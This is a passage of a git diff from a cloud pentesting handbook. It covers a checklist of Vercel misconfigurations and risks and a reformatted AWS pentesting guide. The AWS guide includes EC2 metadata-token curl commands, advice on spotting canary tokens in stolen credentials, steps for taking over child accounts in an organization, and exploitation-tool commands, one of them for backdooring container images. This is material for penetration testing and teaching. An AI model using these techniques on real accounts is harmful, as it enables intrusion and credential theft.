DNS spoofing and cache poisoning attacks. +- **Environment used per domain** + - **Misconfiguration:** Change the environment used by the domain in production. + - **Risk:** Expose potential secrets or functionalities taht shouldn't be available in production. 
+ +--- + +### Environments + +**Purpose:** Define different environments (Development, Preview, Production) with specific settings and variables. + +#### Security Configurations: + +- **Environment Isolation** + - **Misconfiguration:** Sharing environment variables across environments. + - **Risk:** Leakage of production secrets into development or preview environments, increasing exposure. +- **Access to Sensitive Environments** + - **Misconfiguration:** Allowing broad access to production environments. + - **Risk:** Unauthorized changes or access to live applications, leading to potential downtimes or data breaches. + +--- + +### Environment Variables + +**Purpose:** Manage environment-specific variables and secrets used by the application. + +#### Security Configurations: + +- **Exposing Sensitive Variables** + - **Misconfiguration:** Prefixing sensitive variables with `NEXT_PUBLIC_`, making them accessible on the client side. + - **Risk:** Exposure of API keys, database credentials, or other sensitive data to the public, leading to data breaches. +- **Sensitive disabled** + - **Misconfiguration:** If disabled (default) it's possible to read the values of the generated secrets. + - **Risk:** Increased likelihood of accidental exposure or unauthorized access to sensitive information. +- **Shared Environment Variables** + - **Misconfiguration:** These are env variables set at Team level and could also contain sensitive information. + - **Risk:** Increased likelihood of accidental exposure or unauthorized access to sensitive information. + +--- + +### Git + +**Purpose:** Configure Git repository integrations, branch protections, and deployment triggers. + +#### Security Configurations: + +- **Ignored Build Step (TODO)** + - **Misconfiguration:** It looks like this option allows to configure a bash script/commands that will be executed when a new commit is pushed in Github, which could allow RCE. 
+ - **Risk:** TBD + +--- + +### Integrations + +**Purpose:** Connect third-party services and tools to enhance project functionalities. + +#### Security Configurations: + +- **Insecure Third-Party Integrations** + - **Misconfiguration:** Integrating with untrusted or insecure third-party services. + - **Risk:** Introduction of vulnerabilities, data leaks, or backdoors through compromised integrations. +- **Over-Permissioned Integrations** + - **Misconfiguration:** Granting excessive permissions to integrated services. + - **Risk:** Unauthorized access to project resources, data manipulation, or service disruptions. +- **Lack of Integration Monitoring** + - **Misconfiguration:** Failing to monitor and audit third-party integrations. + - **Risk:** Delayed detection of compromised integrations, increasing the potential impact of security breaches. + +--- + +### Deployment Protection + +**Purpose:** Secure deployments through various protection mechanisms, controlling who can access and deploy to your environments. + +#### Security Configurations: + +**Vercel Authentication** + +- **Misconfiguration:** Disabling authentication or not enforcing team member checks. +- **Risk:** Unauthorized users can access deployments, leading to data breaches or application misuse. + +**Protection Bypass for Automation** + +- **Misconfiguration:** Exposing the bypass secret publicly or using weak secrets. +- **Risk:** Attackers can bypass deployment protections, accessing and manipulating protected deployments. + +**Shareable Links** + +- **Misconfiguration:** Sharing links indiscriminately or failing to revoke outdated links. +- **Risk:** Unauthorized access to protected deployments, bypassing authentication and IP restrictions. + +**OPTIONS Allowlist** + +- **Misconfiguration:** Allowlisting overly broad paths or sensitive endpoints. +- **Risk:** Attackers can exploit unprotected paths to perform unauthorized actions or bypass security checks. 
+ +**Password Protection** + +- **Misconfiguration:** Using weak passwords or sharing them insecurely. +- **Risk:** Unauthorized access to deployments if passwords are guessed or leaked. +- **Note:** Available on the **Pro** plan as part of **Advanced Deployment Protection** for an additional $150/month. + +**Deployment Protection Exceptions** + +- **Misconfiguration:** Adding production or sensitive domains to the exception list inadvertently. +- **Risk:** Exposure of critical deployments to the public, leading to data leaks or unauthorized access. +- **Note:** Available on the **Pro** plan as part of **Advanced Deployment Protection** for an additional $150/month. + +**Trusted IPs** + +- **Misconfiguration:** Incorrectly specifying IP addresses or CIDR ranges. +- **Risk:** Legitimate users being blocked or unauthorized IPs gaining access. +- **Note:** Available on the **Enterprise** plan. + +--- + +### Functions + +**Purpose:** Configure serverless functions, including runtime settings, memory allocation, and security policies. + +#### Security Configurations: + +- **Nothing** + +--- + +### Data Cache + +**Purpose:** Manage caching strategies and settings to optimize performance and control data storage. + +#### Security Configurations: + +- **Purge Cache** + - **Misconfiguration:** It allows to delete all the cache. + - **Risk:** Unauthorized users deleting the cache leading to a potential DoS. + +--- + +### Cron Jobs + +**Purpose:** Schedule automated tasks and scripts to run at specified intervals. + +#### Security Configurations: + +- **Disable Cron Job** + - **Misconfiguration:** It allows to disable cron jobs declared inside the code + - **Risk:** Potential interruption of the service (depending on what the cron jobs were meant for) + +--- + +### Log Drains + +**Purpose:** Configure external logging services to capture and store application logs for monitoring and auditing. 
+ +#### Security Configurations: + +- Nothing (managed from teams settings) + +--- + +### Security + +**Purpose:** Central hub for various security-related settings affecting project access, source protection, and more. + +#### Security Configurations: + +**Build Logs and Source Protection** + +- **Misconfiguration:** Disabling protection or exposing `/logs` and `/src` paths publicly. +- **Risk:** Unauthorized access to build logs and source code, leading to information leaks and potential exploitation of vulnerabilities. + +**Git Fork Protection** + +- **Misconfiguration:** Allowing unauthorized pull requests without proper reviews. +- **Risk:** Malicious code can be merged into the codebase, introducing vulnerabilities or backdoors. + +**Secure Backend Access with OIDC Federation** + +- **Misconfiguration:** Incorrectly setting up OIDC parameters or using insecure issuer URLs. +- **Risk:** Unauthorized access to backend services through flawed authentication flows. + +**Deployment Retention Policy** + +- **Misconfiguration:** Setting retention periods too short (losing deployment history) or too long (unnecessary data retention). +- **Risk:** Inability to perform rollbacks when needed or increased risk of data exposure from old deployments. + +**Recently Deleted Deployments** + +- **Misconfiguration:** Not monitoring deleted deployments or relying solely on automated deletions. +- **Risk:** Loss of critical deployment history, hindering audits and rollbacks. + +--- + +### Advanced + +**Purpose:** Access to additional project settings for fine-tuning configurations and enhancing security. + +#### Security Configurations: + +**Directory Listing** + +- **Misconfiguration:** Enabling directory listing allows users to view directory contents without an index file. +- **Risk:** Exposure of sensitive files, application structure, and potential entry points for attacks. 
+ +--- + +## Project Firewall + +### Firewall + +#### Security Configurations: + +**Enable Attack Challenge Mode** + +- **Misconfiguration:** Enabling this improves the defenses of the web application against DoS but at the cost of usability +- **Risk:** Potential user experience problems. + +### Custom Rules & IP Blocking + +- **Misconfiguration:** Allows to unblock/block traffic +- **Risk:** Potential DoS allowing malicious traffic or blocking benign traffic + +--- + +## Project Deployment + +### Source + +- **Misconfiguration:** Allows access to read the complete source code of the application +- **Risk:** Potential exposure of sensitive information + +### Skew Protection + +- **Misconfiguration:** This protection ensures the client and server application are always using the same version so there is no desynchronizations were the client uses a different version from the server and therefore they don't understand each other. +- **Risk:** Disabling this (if enabled) could cause DoS problems in new deployments in the future + +--- + +## Team Settings + +### General + +#### Security Configurations: + +- **Transfer** + - **Misconfiguration:** Allows to transfer all the projects to another team + - **Risk:** An attacker could steal the projects +- **Delete Project** + - **Misconfiguration:** Allows to delete the team with all the projects + - **Risk:** Delete the projects + +--- + +### Billing + +#### Security Configurations: + +- **Speed Insights Cost Limit** + - **Misconfiguration:** An attacker could increase this number + - **Risk:** Increased costs + +--- + +### Members + +#### Security Configurations: + +- **Add members** + - **Misconfiguration:** An attacker could maintain persitence inviting an account he control + - **Risk:** Attacker persistence +- **Roles** + - **Misconfiguration:** Granting too many permissions to people that doesn't need it increases the risk of the vercel configuration. 
Check all the possible roles in [https://vercel.com/docs/accounts/team-members-and-roles/access-roles](https://vercel.com/docs/accounts/team-members-and-roles/access-roles) + - **Risk**: Increate the exposure of the Vercel Team + +--- + +### Access Groups + +An **Access Group** in Vercel is a collection of projects and team members with predefined role assignments, enabling centralized and streamlined access management across multiple projects. + +**Potential Misconfigurations:** + +- **Over-Permissioning Members:** Assigning roles with more permissions than necessary, leading to unauthorized access or actions. +- **Improper Role Assignments:** Incorrectly assigning roles that do not align with team members' responsibilities, causing privilege escalation. +- **Lack of Project Segregation:** Failing to separate sensitive projects, allowing broader access than intended. +- **Insufficient Group Management:** Not regularly reviewing or updating Access Groups, resulting in outdated or inappropriate access permissions. +- **Inconsistent Role Definitions:** Using inconsistent or unclear role definitions across different Access Groups, leading to confusion and security gaps. + +--- + +### Log Drains + +#### Security Configurations: + +- **Log Drains to third parties:** + - **Misconfiguration:** An attacker could configure a Log Drain to steal the logs + - **Risk:** Partial persistence + +--- + +### Security & Privacy + +#### Security Configurations: + +- **Team Email Domain:** When configured, this setting automatically invites Vercel Personal Accounts with email addresses ending in the specified domain (e.g., `mydomain.com`) to join your team upon signup and on the dashboard. + - **Misconfiguration:** + - Specifying the wrong email domain or a misspelled domain in the Team Email Domain setting. + - Using a common email domain (e.g., `gmail.com`, `hotmail.com`) instead of a company-specific domain. 
+ - **Risks:**
+ - **Unauthorized Access:** Users with email addresses from unintended domains may receive invitations to join your team.
+ - **Data Exposure:** Potential exposure of sensitive project information to unauthorized individuals.
+- **Protected Git Scopes:** Allows you to add up to 5 Git scopes to your team to prevent other Vercel teams from deploying repositories from the protected scope. Multiple teams can specify the same scope, allowing both teams access.
+ - **Misconfiguration:** Not adding critical Git scopes to the protected list.
+- **Risks:**
+ - **Unauthorized Deployments:** Other teams may deploy repositories from your organization's Git scopes without authorization.
+ - **Intellectual Property Exposure:** Proprietary code could be deployed and accessed outside your team.
+- **Environment Variable Policies:** Enforces policies for the creation and editing of the team's environment variables. Specifically, you can enforce that all environment variables are created as **Sensitive Environment Variables**, which can only be decrypted by Vercel's deployment system.
+ - **Misconfiguration:** Keeping the enforcement of sensitive environment variables disabled.
+ - **Risks:**
+ - **Exposure of Secrets:** Environment variables may be viewed or edited by unauthorized team members.
+ - **Data Breach:** Sensitive information like API keys and credentials could be leaked.
+- **Audit Log:** Provides an export of the team's activity for up to the last 90 days. Audit logs help in monitoring and tracking actions performed by team members.
+ - **Misconfiguration:**\
+ Granting access to audit logs to unauthorized team members.
+ - **Risks:**
+ - **Privacy Violations:** Exposure of sensitive user activities and data.
+ - **Tampering with Logs:** Malicious actors could alter or delete logs to cover their tracks. 
+- **SAML Single Sign-On:** Allows customization of SAML authentication and directory syncing for your team, enabling integration with an Identity Provider (IdP) for centralized authentication and user management.
+ - **Misconfiguration:** An attacker could backdoor the Team setting up SAML parameters such as Entity ID, SSO URL, or certificate fingerprints.
+ - **Risk:** Maintain persistence
+- **IP Address Visibility:** Controls whether IP addresses, which may be considered personal information under certain data protection laws, are displayed in Monitoring queries and Log Drains.
+ - **Misconfiguration:** Leaving IP address visibility enabled without necessity.
+ - **Risks:**
+ - **Privacy Violations:** Non-compliance with data protection regulations like GDPR.
+ - **Legal Repercussions:** Potential fines and penalties for mishandling personal data.
+- **IP Blocking:** Allows the configuration of IP addresses and CIDR ranges that Vercel should block requests from. Blocked requests do not contribute to your billing.
+ - **Misconfiguration:** Could be abused by an attacker to allow malicious traffic or block legit traffic.
+ - **Risks:**
+ - **Service Denial to Legitimate Users:** Blocking access for valid users or partners.
+ - **Operational Disruptions:** Loss of service availability for certain regions or clients.
+
+---
+
+### Secure Compute
+
+**Vercel Secure Compute** enables secure, private connections between Vercel Functions and backend environments (e.g., databases) by establishing isolated networks with dedicated IP addresses. This eliminates the need to expose backend services publicly, enhancing security, compliance, and privacy.
+
+#### **Potential Misconfigurations and Risks**
+
+1. **Incorrect AWS Region Selection**
+ - **Misconfiguration:** Choosing an AWS region for the Secure Compute network that doesn't match the backend services' region.
+ - **Risk:** Increased latency, potential data residency compliance issues, and degraded performance.
+2. 
**Overlapping CIDR Blocks**
+ - **Misconfiguration:** Selecting CIDR blocks that overlap with existing VPCs or other networks.
+ - **Risk:** Network conflicts leading to failed connections, unauthorized access, or data leakage between networks.
+3. **Improper VPC Peering Configuration**
+ - **Misconfiguration:** Incorrectly setting up VPC peering (e.g., wrong VPC IDs, incomplete route table updates).
+ - **Risk:** Unauthorized access to backend infrastructure, failed secure connections, and potential data breaches.
+4. **Excessive Project Assignments**
+ - **Misconfiguration:** Assigning multiple projects to a single Secure Compute network without proper isolation.
+ - **Risk:** Shared IP exposure increases the attack surface, potentially allowing compromised projects to affect others.
+5. **Inadequate IP Address Management**
+ - **Misconfiguration:** Failing to manage or rotate dedicated IP addresses appropriately.
+ - **Risk:** IP spoofing, tracking vulnerabilities, and potential blacklisting if IPs are associated with malicious activities.
+6. **Including Build Containers Unnecessarily**
+ - **Misconfiguration:** Adding build containers to the Secure Compute network when backend access isn't required during builds.
+ - **Risk:** Expanded attack surface, increased provisioning delays, and unnecessary consumption of network resources.
+7. **Failure to Securely Handle Bypass Secrets**
+ - **Misconfiguration:** Exposing or mishandling secrets used to bypass deployment protections.
+ - **Risk:** Unauthorized access to protected deployments, allowing attackers to manipulate or deploy malicious code.
+8. **Ignoring Region Failover Configurations**
+ - **Misconfiguration:** Not setting up passive failover regions or misconfiguring failover settings.
+ - **Risk:** Service downtime during primary region outages, leading to reduced availability and potential data inconsistency.
+9. 
**Exceeding VPC Peering Connection Limits**
+ - **Misconfiguration:** Attempting to establish more VPC peering connections than the allowed limit (e.g., exceeding 50 connections).
+ - **Risk:** Inability to connect necessary backend services securely, causing deployment failures and operational disruptions.
+10. **Insecure Network Settings**
+ - **Misconfiguration:** Weak firewall rules, lack of encryption, or improper network segmentation within the Secure Compute network.
+ - **Risk:** Data interception, unauthorized access to backend services, and increased vulnerability to attacks.
+
+---
+
+### Environment Variables
+
+**Purpose:** Manage environment-specific variables and secrets used by all the projects.
+
+#### Security Configurations:
+
+- **Exposing Sensitive Variables**
+ - **Misconfiguration:** Prefixing sensitive variables with `NEXT_PUBLIC_`, making them accessible on the client side.
+ - **Risk:** Exposure of API keys, database credentials, or other sensitive data to the public, leading to data breaches.
+- **Sensitive disabled**
+ - **Misconfiguration:** If disabled (default) it's possible to read the values of the generated secrets.
+ - **Risk:** Increased likelihood of accidental exposure or unauthorized access to sensitive information.
+
+{{#include ../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/aws-security/README.md b/src/pentesting-cloud/aws-security/README.md
similarity index 64%
rename from pentesting-cloud/aws-security/README.md
rename to src/pentesting-cloud/aws-security/README.md
index 1efc09d3b..8c53688de 100644
--- a/pentesting-cloud/aws-security/README.md
+++ b/src/pentesting-cloud/aws-security/README.md
@@ -1,19 +1,6 @@ # AWS Pentesting -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../banners/hacktricks-training.md}} ## Basic Information @@ -21,24 +8,24 @@ Learn & practice GCP Hacking: [!NOTE] +> After you have managed to obtain credentials, you need to know **to who do those creds belong**, and **what they have access to**, so you need to perform some basic enumeration: ## Basic Enumeration @@ -80,7 +66,9 @@ After you have managed to obtain credentials, you need to know **to who do those If you found a SSRF in a machine inside AWS check this page for tricks: -{% embed url="https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf" %} +{{#ref}} +https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf +{{#endref}} ### Whoami @@ -102,16 +90,15 @@ TOKEN=`curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metad curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/dynamic/instance-identity/document ``` -{% hint style="danger" %} -Note that companies might use **canary tokens** to identify when **tokens are being stolen and used**. It's recommended to check if a token is a canary token or not before using it.\ -For more info [**check this page**](aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.md#honeytokens-bypass). -{% endhint %} +> [!CAUTION] +> Note that companies might use **canary tokens** to identify when **tokens are being stolen and used**. It's recommended to check if a token is a canary token or not before using it.\ +> For more info [**check this page**](aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.md#honeytokens-bypass). ### Org Enumeration -{% content-ref url="aws-services/aws-organizations-enum.md" %} -[aws-organizations-enum.md](aws-services/aws-organizations-enum.md) -{% endcontent-ref %} +{{#ref}} +aws-services/aws-organizations-enum.md +{{#endref}} ### IAM Enumeration 
@@ -120,38 +107,37 @@ If you have enough permissions **checking the privileges of each entity inside t If you don't have enough permissions to enumerate IAM, you can **steal bruteforce them** to figure them out.\ Check **how to do the numeration and brute-forcing** in: -{% content-ref url="aws-services/aws-iam-enum.md" %} -[aws-iam-enum.md](aws-services/aws-iam-enum.md) -{% endcontent-ref %} +{{#ref}} +aws-services/aws-iam-enum.md +{{#endref}} -{% hint style="info" %} -Now that you **have some information about your credentials** (and if you are a red team hopefully you **haven't been detected**). It's time to figure out which services are being used in the environment.\ -In the following section you can check some ways to **enumerate some common services.** -{% endhint %} +> [!NOTE] +> Now that you **have some information about your credentials** (and if you are a red team hopefully you **haven't been detected**). It's time to figure out which services are being used in the environment.\ +> In the following section you can check some ways to **enumerate some common services.** ## Services Enumeration, Post-Exploitation & Persistence AWS has an astonishing amount of services, in the following page you will find **basic information, enumeration** cheatsheets\*\*,\*\* how to **avoid detection**, obtain **persistence**, and other **post-exploitation** tricks about some of them: -{% content-ref url="aws-services/" %} -[aws-services](aws-services/) -{% endcontent-ref %} +{{#ref}} +aws-services/ +{{#endref}} Note that you **don't** need to perform all the work **manually**, below in this post you can find a **section about** [**automatic tools**](./#automated-tools). 
Moreover, in this stage you might discovered **more services exposed to unauthenticated users,** you might be able to exploit them: -{% content-ref url="aws-unauthenticated-enum-access/" %} -[aws-unauthenticated-enum-access](aws-unauthenticated-enum-access/) -{% endcontent-ref %} +{{#ref}} +aws-unauthenticated-enum-access/ +{{#endref}} ## Privilege Escalation If you can **check at least your own permissions** over different resources you could **check if you are able to obtain further permissions**. You should focus at least in the permissions indicated in: -{% content-ref url="aws-privilege-escalation/" %} -[aws-privilege-escalation](aws-privilege-escalation/) -{% endcontent-ref %} +{{#ref}} +aws-privilege-escalation/ +{{#endref}} ## Publicly Exposed Services @@ -160,7 +146,9 @@ As pentester/red teamer you should always check if you can find **sensitive info In this book you should find **information** about how to find **exposed AWS services and how to check them**. About how to find **vulnerabilities in exposed network services** I would recommend you to **search** for the specific **service** in: -{% embed url="https://book.hacktricks.xyz/" %} +{{#ref}} +https://book.hacktricks.xyz/ +{{#endref}} ## Compromising the Organization @@ -168,20 +156,20 @@ In this book you should find **information** about how to find **exposed AWS ser When the management account creates new accounts in the organization, a **new role** is created in the new account, by default named **`OrganizationAccountAccessRole`** and giving **AdministratorAccess** policy to the **management account** to access the new account. -
+
So, in order to access as administrator a child account you need: -* **Compromise** the **management** account and find the **ID** of the **children accounts** and the **names** of the **role** (OrganizationAccountAccessRole by default) allowing the management account to access as admin. - * To find children accounts go to the organizations section in the aws console or run `aws organizations list-accounts` - * You cannot find the name of the roles directly, so check all the custom IAM policies and search any allowing **`sts:AssumeRole` over the previously discovered children accounts**. -* **Compromise** a **principal** in the management account with **`sts:AssumeRole` permission over the role in the children accounts** (even if the account is allowing anyone from the management account to impersonate, as its an external account, specific `sts:AssumeRole` permissions are necessary). +- **Compromise** the **management** account and find the **ID** of the **children accounts** and the **names** of the **role** (OrganizationAccountAccessRole by default) allowing the management account to access as admin. + - To find children accounts go to the organizations section in the aws console or run `aws organizations list-accounts` + - You cannot find the name of the roles directly, so check all the custom IAM policies and search any allowing **`sts:AssumeRole` over the previously discovered children accounts**. +- **Compromise** a **principal** in the management account with **`sts:AssumeRole` permission over the role in the children accounts** (even if the account is allowing anyone from the management account to impersonate, as its an external account, specific `sts:AssumeRole` permissions are necessary). ## Automated Tools ### Recon -* [**aws-recon**](https://github.com/darkbitio/aws-recon): A multi-threaded AWS security-focused **inventory collection tool** written in Ruby. 
+- [**aws-recon**](https://github.com/darkbitio/aws-recon): A multi-threaded AWS security-focused **inventory collection tool** written in Ruby. ```bash # Install @@ -194,8 +182,8 @@ AWS_PROFILE= aws_recon \ --verbose ``` -* [**cloudlist**](https://github.com/projectdiscovery/cloudlist): Cloudlist is a **multi-cloud tool for getting Assets** (Hostnames, IP Addresses) from Cloud Providers. -* [**cloudmapper**](https://github.com/duo-labs/cloudmapper): CloudMapper helps you analyze your Amazon Web Services (AWS) environments. It now contains much more functionality, including auditing for security issues. +- [**cloudlist**](https://github.com/projectdiscovery/cloudlist): Cloudlist is a **multi-cloud tool for getting Assets** (Hostnames, IP Addresses) from Cloud Providers. +- [**cloudmapper**](https://github.com/duo-labs/cloudmapper): CloudMapper helps you analyze your Amazon Web Services (AWS) environments. It now contains much more functionality, including auditing for security issues. ```bash # Installation steps in github @@ -223,7 +211,7 @@ python3 cloudmapper.py stats --accounts dev ## In the report you will find all the info already python3 cloudmapper.py report --accounts dev -# Identify potential issues +# Identify potential issues python3 cloudmapper.py audit --accounts dev --json > audit.json python3 cloudmapper.py audit --accounts dev --markdow > audit.md python3 cloudmapper.py iam_report --accounts dev 
@@ -242,7 +230,7 @@ python cloudmapper.py prepare #Prepare webserver
 python cloudmapper.py webserver #Show webserver
 ```
-* [**cartography**](https://github.com/lyft/cartography): Cartography is a Python tool that consolidates infrastructure assets and the relationships between them in an intuitive graph view powered by a Neo4j database.
+- [**cartography**](https://github.com/lyft/cartography): Cartography is a Python tool that consolidates infrastructure assets and the relationships between them in an intuitive graph view powered by a Neo4j database.
 ```bash
 # Install
@@ -253,15 +241,15 @@ pip install cartography
 AWS_PROFILE=dev cartography --neo4j-uri bolt://127.0.0.1:7687 --neo4j-password-prompt --neo4j-user neo4j
 ```
-* [**starbase**](https://github.com/JupiterOne/starbase): Starbase collects assets and relationships from services and systems including cloud infrastructure, SaaS applications, security controls, and more into an intuitive graph view backed by the Neo4j database.
-* [**aws-inventory**](https://github.com/nccgroup/aws-inventory): (Uses python2) This is a tool that tries to **discover all** [**AWS resources**](https://docs.aws.amazon.com/general/latest/gr/glos-chap.html#resource) created in an account.
-* [**aws\_public\_ips**](https://github.com/arkadiyt/aws_public_ips): It's a tool to **fetch all public IP addresses** (both IPv4/IPv6) associated with an AWS account.
+- [**starbase**](https://github.com/JupiterOne/starbase): Starbase collects assets and relationships from services and systems including cloud infrastructure, SaaS applications, security controls, and more into an intuitive graph view backed by the Neo4j database.
+- [**aws-inventory**](https://github.com/nccgroup/aws-inventory): (Uses python2) This is a tool that tries to **discover all** [**AWS resources**](https://docs.aws.amazon.com/general/latest/gr/glos-chap.html#resource) created in an account.
+- [**aws_public_ips**](https://github.com/arkadiyt/aws_public_ips): It's a tool to **fetch all public IP addresses** (both IPv4/IPv6) associated with an AWS account.
 ### Privesc & Exploiting
-* [**SkyArk**](https://github.com/cyberark/SkyArk)**:** Discover the most privileged users in the scanned AWS environment, including the AWS Shadow Admins. It uses powershell. You can find the **definition of privileged policies** in the function **`Check-PrivilegedPolicy`** in [https://github.com/cyberark/SkyArk/blob/master/AWStealth/AWStealth.ps1](https://github.com/cyberark/SkyArk/blob/master/AWStealth/AWStealth.ps1). 
-* [**pacu**](https://github.com/RhinoSecurityLabs/pacu): Pacu is an open-source **AWS exploitation framework**, designed for offensive security testing against cloud environments. It can **enumerate**, find **miss-configurations** and **exploit** them. You can find the **definition of privileged permissions** in [https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/iam\_\_privesc\_scan/main.py#L134](https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/iam__privesc_scan/main.py#L134) inside the **`user_escalation_methods`** dict.
- * Note that pacu **only checks your own privescs paths** (not account wide).
+- [**SkyArk**](https://github.com/cyberark/SkyArk)**:** Discover the most privileged users in the scanned AWS environment, including the AWS Shadow Admins. It uses powershell. You can find the **definition of privileged policies** in the function **`Check-PrivilegedPolicy`** in [https://github.com/cyberark/SkyArk/blob/master/AWStealth/AWStealth.ps1](https://github.com/cyberark/SkyArk/blob/master/AWStealth/AWStealth.ps1).
+- [**pacu**](https://github.com/RhinoSecurityLabs/pacu): Pacu is an open-source **AWS exploitation framework**, designed for offensive security testing against cloud environments. It can **enumerate**, find **miss-configurations** and **exploit** them. You can find the **definition of privileged permissions** in [https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/iam\_\_privesc_scan/main.py#L134](https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/iam__privesc_scan/main.py#L134) inside the **`user_escalation_methods`** dict.
+ - Note that pacu **only checks your own privescs paths** (not account wide).
 ```bash
 # Install
@@ -277,7 +265,7 @@ pacu > exec iam__privesc_scan # List privileged permissions
 ```
-* [**PMapper**](https://github.com/nccgroup/PMapper): Principal Mapper (PMapper) is a script and library for identifying risks in the configuration of AWS Identity and Access Management (IAM) for an AWS account or an AWS organization. It models the different IAM Users and Roles in an account as a directed graph, which enables checks for **privilege escalation** and for alternate paths an attacker could take to gain access to a resource or action in AWS. You can check the **permissions used to find privesc** paths in the filenames ended in `_edges.py` in [https://github.com/nccgroup/PMapper/tree/master/principalmapper/graphing](https://github.com/nccgroup/PMapper/tree/master/principalmapper/graphing)
+- [**PMapper**](https://github.com/nccgroup/PMapper): Principal Mapper (PMapper) is a script and library for identifying risks in the configuration of AWS Identity and Access Management (IAM) for an AWS account or an AWS organization. It models the different IAM Users and Roles in an account as a directed graph, which enables checks for **privilege escalation** and for alternate paths an attacker could take to gain access to a resource or action in AWS. You can check the **permissions used to find privesc** paths in the filenames ended in `_edges.py` in [https://github.com/nccgroup/PMapper/tree/master/principalmapper/graphing](https://github.com/nccgroup/PMapper/tree/master/principalmapper/graphing)
 ```bash
 # Install
@@ -301,7 +289,7 @@ pmapper --profile dev orgs create
 pmapper --profile dev orgs display
 ```
-* [**cloudsplaining**](https://github.com/salesforce/cloudsplaining): Cloudsplaining is an AWS IAM Security Assessment tool that identifies violations of least privilege and generates a risk-prioritized HTML report.\
+- [**cloudsplaining**](https://github.com/salesforce/cloudsplaining): Cloudsplaining is an AWS IAM Security Assessment tool that identifies violations of least privilege and generates a risk-prioritized HTML report.\
 It will show you potentially **over privileged** customer, inline and aws **policies** and which **principals has access to them**. (It not only checks for privesc but also other kind of interesting permissions, recommended to use).
 ```bash
@@ -316,13 +304,13 @@ cloudsplaining download --profile dev
 cloudsplaining scan --input-file /private/tmp/cloudsplaining/dev.json --output /tmp/files/
 ```
-* [**cloudjack**](https://github.com/prevade/cloudjack): CloudJack assesses AWS accounts for **subdomain hijacking vulnerabilities** as a result of decoupled Route53 and CloudFront configurations.
-* [**ccat**](https://github.com/RhinoSecurityLabs/ccat): List ECR repos -> Pull ECR repo -> Backdoor it -> Push backdoored image
-* [**Dufflebag**](https://github.com/bishopfox/dufflebag): Dufflebag is a tool that **searches** through public Elastic Block Storage (**EBS) snapshots for secrets** that may have been accidentally left in.
+- [**cloudjack**](https://github.com/prevade/cloudjack): CloudJack assesses AWS accounts for **subdomain hijacking vulnerabilities** as a result of decoupled Route53 and CloudFront configurations.
+- [**ccat**](https://github.com/RhinoSecurityLabs/ccat): List ECR repos -> Pull ECR repo -> Backdoor it -> Push backdoored image
+- [**Dufflebag**](https://github.com/bishopfox/dufflebag): Dufflebag is a tool that **searches** through public Elastic Block Storage (**EBS) snapshots for secrets** that may have been accidentally left in.
 ### Audit
-* [**cloudsploit**](https://github.com/aquasecurity/cloudsploit)**:** CloudSploit by Aqua is an open-source project designed to allow detection of **security risks in cloud infrastructure** accounts, including: Amazon Web Services (AWS), Microsoft Azure, Google Cloud Platform (GCP), Oracle Cloud Infrastructure (OCI), and GitHub (It doesn't look for ShadowAdmins).
+- [**cloudsploit**](https://github.com/aquasecurity/cloudsploit)**:** CloudSploit by Aqua is an open-source project designed to allow detection of **security risks in cloud infrastructure** accounts, including: Amazon Web Services (AWS), Microsoft Azure, Google Cloud Platform (GCP), Oracle Cloud Infrastructure (OCI), and GitHub (It doesn't look for ShadowAdmins). 
 ```bash
 ./index.js --csv=file.csv --console=table --config ./config.js
@@ -331,7 +319,7 @@ cloudsplaining scan --input-file /private/tmp/cloudsplaining/dev.json --output /
 ## use "cis" for cis level 1 and 2
 ```
-* [**Prowler**](https://github.com/prowler-cloud/prowler): Prowler is an Open Source security tool to perform AWS security best practices assessments, audits, incident response, continuous monitoring, hardening and forensics readiness.
+- [**Prowler**](https://github.com/prowler-cloud/prowler): Prowler is an Open Source security tool to perform AWS security best practices assessments, audits, incident response, continuous monitoring, hardening and forensics readiness.
 ```bash
 # Install python3, jq and git
@@ -344,13 +332,13 @@ prowler
 prowler aws --profile custom-profile [-M csv json json-asff html]
 ```
-* [**CloudFox**](https://github.com/BishopFox/cloudfox): CloudFox helps you gain situational awareness in unfamiliar cloud environments. It’s an open source command line tool created to help penetration testers and other offensive security professionals find exploitable attack paths in cloud infrastructure.
+- [**CloudFox**](https://github.com/BishopFox/cloudfox): CloudFox helps you gain situational awareness in unfamiliar cloud environments. It’s an open source command line tool created to help penetration testers and other offensive security professionals find exploitable attack paths in cloud infrastructure.
 ```bash
 cloudfox aws --profile [profile-name] all-checks
 ```
-* [**ScoutSuite**](https://github.com/nccgroup/ScoutSuite): Scout Suite is an open source multi-cloud security-auditing tool, which enables security posture assessment of cloud environments.
+- [**ScoutSuite**](https://github.com/nccgroup/ScoutSuite): Scout Suite is an open source multi-cloud security-auditing tool, which enables security posture assessment of cloud environments.
 ```bash
 # Install
@@ -363,14 +351,14 @@ scout --help
 scout aws -p dev
 ```
-* [**cs-suite**](https://github.com/SecurityFTW/cs-suite): Cloud Security Suite (uses python2.7 and looks unmaintained)
